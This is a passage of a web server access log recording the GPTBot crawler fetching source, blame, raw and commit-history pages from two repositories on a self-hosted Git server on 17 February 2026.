+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:14:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 635] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:14:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 11478] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:14:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 526156] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 522389] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 29753] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" +[17/Feb/2026:14:03:02 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" +[17/Feb/2026:14:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" [Client 74.7.227.38] [Length 11535] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" +[17/Feb/2026:14:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" +[17/Feb/2026:14:03:05 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" +[17/Feb/2026:14:03:05 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" +[17/Feb/2026:14:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:14:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 863930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:14:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:14:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 858166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:14:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 799983] [Gzip 27.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:14:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" [Client 74.7.227.38] [Length 10666] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" +[17/Feb/2026:14:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" [Client 74.7.227.38] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" +[17/Feb/2026:14:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 805881] [Gzip 27.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:14:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 21023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" +[17/Feb/2026:14:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14230] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" +[17/Feb/2026:14:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15576] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" +[17/Feb/2026:14:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14843] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" +[17/Feb/2026:14:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13680] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13813] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" +[17/Feb/2026:14:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" +[17/Feb/2026:14:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" [Client 74.7.227.38] [Length 12527] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" +[17/Feb/2026:14:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" [Client 74.7.227.38] [Length 10979] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" +[17/Feb/2026:14:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" [Client 74.7.227.38] [Length 10979] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" +[17/Feb/2026:14:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" [Client 74.7.227.38] [Length 10979] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" +[17/Feb/2026:14:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" +[17/Feb/2026:14:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" +[17/Feb/2026:14:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" +[17/Feb/2026:14:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" +[17/Feb/2026:14:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" +[17/Feb/2026:14:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" +[17/Feb/2026:14:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14326] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14686] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" +[17/Feb/2026:14:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10202] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets" +[17/Feb/2026:14:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14986] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14985] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15932] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14687] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" +[17/Feb/2026:14:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14688] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" +[17/Feb/2026:14:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16942] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14986] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10203] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 